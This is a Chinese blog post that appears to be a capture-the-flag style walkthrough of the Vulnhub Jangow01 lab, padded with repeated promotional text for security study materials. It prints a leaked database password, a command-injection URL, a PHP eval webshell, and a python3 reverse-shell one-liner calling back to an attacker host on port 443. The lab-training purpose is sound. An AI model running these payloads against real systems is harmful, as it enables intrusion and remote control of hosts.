2024年最新Vulnhub内网渗透Jangow01靶场通关(1)，2024年最新网络安全-MVP模式详解

最新推荐文章于 2024-07-20 08:27:55 发布

2401_84281738

最新推荐文章于 2024-07-20 08:27:55 发布

阅读量268

点赞数 5

分类专栏：程序员文章标签：网络安全学习面试

本文链接：https://blog.csdn.net/2401_84281738/article/details/138708242

版权

程序员专栏收录该内容

163 篇文章 0 订阅

订阅专栏

一、网安学习成长路线图

网安所有方向的技术点做的整理，形成各个领域的知识点汇总，它的用处就在于，你可以按照上面的知识点去找对应的学习资源，保证自己学得较为全面。
在这里插入图片描述

二、网安视频合集

观看零基础学习视频，看视频学习是最快捷也是最有效果的方式，跟着视频中老师的思路，从基础到深入，还是很容易入门的。
在这里插入图片描述

三、精品网安学习书籍

当我学到一定基础，有自己的理解能力的时候，会去阅读一些前辈整理的书籍或者手写的笔记资料，这些笔记详细记载了他们对一些技术点的理解，这些理解是比较独到，可以学到不一样的思路。
在这里插入图片描述

四、网络安全源码合集+工具包

光学理论是没用的，要学会跟着一起敲，要动手实操，才能将自己的所学运用到实际当中去，这时候可以搞点实战案例来学习。
在这里插入图片描述

五、网络安全面试题

最后就是大家最关心的网络安全面试题板块
在这里插入图片描述

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化资料的朋友，可以点击这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

发现开放了21ftp和80http端口，对80端口进行进一步目录扫描

dirsearch -u 192.168.168.15

Pasted Graphic 1

扫描到了一个.backup文件，访问预览一下

$servername = "localhost";
$database = "jangow01";
$username = "jangow01";
$password = "abygurl69";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
// Check connection
if (!$conn) {
    die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
mysqli_close($conn);

可以看到这是一个php的配置文件，包含servername、 database、 username、 password，但是这里是localhost，数据库端口并没有对外开放，所以暂时无法利用。

再访问一下/site站点，首页上的Buscar非常可疑，访问后是如下网址：

192.168.168.15/site/busque.php?buscar=

经过测试之后可以命令执行

Pasted Graphic 3

其他信息搜集的差不多了，这里可能会是一个突破口

测试过程

上面扫描出来了ftp服务，尝试使用.backup进行连接

Connected to 192.168.168.15.

连接成功了，也看到了当前站点的文件目录，但是经过测试没有put权限，没有办法上传文件。

站点的命令执行第一个想到的是直接反弹shell，但是经过测试发现似乎无法执行bash和nc等命令

后来发现可以直接使用python3反弹shell

Pasted Graphic 6

为了更好操作，尝试使用echo写入一句话木马，然后使用蚁剑连接

192.168.168.15/site/busque.php?echo '<?php phpinfo();eval($\_REQUEST["x"]);?>' > shell.php

Pasted Graphic 5

webshell 虽然赋予我执行命令、管理文件的能力，但毕竟不是真正的 shell，无法执行交互式命令、无法控制进程状态、无法补全命令等等，非常不利于提权操作以及横向移动，所以，必须反弹 shell以执行更多的操作。

尝试了几乎所有的反弹shell命令，都无法成功监听到，后来想到有可能是出站策略中限制了端口。参考这篇文章，尝试了443端口，成功反弹shell。这里需要注意，该靶场没有python命令，而是python3

python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("192.168.168.5",443));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/sh")'

Pasted Graphic 8

wordpress

成功反弹到shell后，建立一个交互式终端

python3 -c 'import pty;pty.spawn("/bin/bash");'

还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！

王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。

对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！

【完整版领取方式在文末！！】

93道网络安全面试题

内容实在太多，不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料，给那些想学习网络安全的小伙伴们一点帮助！

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

1️⃣零基础入门

① 学习路线

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供：

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化资料的朋友，可以点击这里获取

2401_84281738

关注

5
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
2024年最新Vulnhub内网渗透Jangow01靶场通关(1)，2024年最新网络安全-MVP模式详解

当我学到一定基础，有自己的理解能力的时候，会去阅读一些前辈整理的书籍或者手写的笔记资料，这些笔记详细记载了他们对一些技术点的理解，这些理解是比较独到，可以学到不一样的思路。网安所有方向的技术点做的整理，形成各个领域的知识点汇总，它的用处就在于，你可以按照上面的知识点去找对应的学习资源，保证自己学得较为全面。观看零基础学习视频，看视频学习是最快捷也是最有效果的方式，跟着视频中老师的思路，从基础到深入，还是很容易入门的。连接成功了，也看到了当前站点的文件目录，但是经过测试没有put权限，没有办法上传文件。
复制链接

扫一扫